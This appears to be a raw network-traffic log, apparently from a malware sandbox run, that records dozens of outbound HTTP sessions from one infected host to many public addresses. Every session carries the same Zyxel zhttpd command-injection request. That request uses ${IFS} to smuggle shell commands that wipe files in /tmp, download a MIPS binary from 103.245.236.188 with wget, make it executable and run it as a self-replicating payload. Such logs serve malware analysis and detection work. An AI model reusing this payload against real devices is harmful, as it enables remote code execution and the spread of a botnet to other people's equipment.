                                                Jan 12, 2024 18:24:33.791673899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3970192.168.2.1335862179.211.34.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791701078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3971192.168.2.135492463.219.47.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791749954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3972192.168.2.135396634.35.205.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791790009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3973192.168.2.133952262.151.151.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791826963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3974192.168.2.1335954166.190.133.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791879892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3975192.168.2.133879252.63.62.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791918993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3976192.168.2.133970848.11.234.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.791966915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3977192.168.2.1356132109.176.218.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792001009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3978192.168.2.135975268.74.91.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792021036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3979192.168.2.134061249.216.126.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792057037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3980192.168.2.135190632.88.215.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792089939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3981192.168.2.1341372185.194.151.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792145014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3982192.168.2.1350842141.169.42.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792174101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3983192.168.2.134586686.22.21.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792218924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3984192.168.2.1356710154.39.140.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792258024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3985192.168.2.1339184108.40.56.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792272091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3986192.168.2.1344666175.115.173.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792339087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3987192.168.2.1344088212.232.152.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792373896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3988192.168.2.1355694212.36.192.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792393923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3989192.168.2.1345194167.22.134.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792427063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3990192.168.2.1349540112.32.86.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792484999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3991192.168.2.134818637.213.71.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792543888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3992192.168.2.135773099.148.198.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792563915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3993192.168.2.1347240121.122.227.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792628050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3994192.168.2.135314032.138.2.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792644978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3995192.168.2.1338002150.183.152.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792710066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3996192.168.2.136035836.45.155.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792746067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3997192.168.2.1335838203.252.203.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792794943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3998192.168.2.1346148147.95.125.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792824984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3999192.168.2.135712488.97.21.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792848110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4000192.168.2.1353630188.176.84.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792908907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4001192.168.2.133358682.142.147.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792939901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4002192.168.2.1341802197.207.251.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.792979002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4003192.168.2.1346420213.77.241.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.793015003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4004192.168.2.1338990213.218.113.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.793054104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4005192.168.2.1337120141.104.177.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.793097019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4006192.168.2.1357696194.5.4.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.793132067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4007192.168.2.134332259.255.77.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.793164015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4008192.168.2.1346762118.243.68.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.793200016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4009192.168.2.134395023.250.134.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.793235064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4010192.168.2.13461208.140.73.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.793256998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4011192.168.2.134354820.35.196.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.793292046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4012192.168.2.135467677.199.242.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.801457882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4013192.168.2.13524285.238.181.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.801565886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4014192.168.2.134936078.143.195.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.801599979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4015192.168.2.135539898.150.24.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.801645994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4016192.168.2.1347048196.126.103.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.801677942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4017192.168.2.1343214162.2.57.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.801717043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4018192.168.2.134769266.89.158.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.801769972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4019192.168.2.1341914121.225.210.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.801800966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4020192.168.2.1358550135.62.152.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.801831007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4021192.168.2.136066468.233.89.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.801879883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4022192.168.2.135370257.63.105.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.801911116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4023192.168.2.135930081.158.110.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.801964045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4024192.168.2.133835031.29.161.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.801976919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4025192.168.2.1346096187.225.41.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802028894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4026192.168.2.1354996180.228.124.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802074909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4027192.168.2.133493293.2.72.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802119017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4028192.168.2.1338656221.110.53.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802138090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4029192.168.2.133558452.77.156.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802198887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4030192.168.2.135316652.229.20.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802232027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4031192.168.2.133912275.17.55.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.802284002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4032192.168.2.1356110217.178.251.36443
                                                TimestampBytes transferredDirectionData
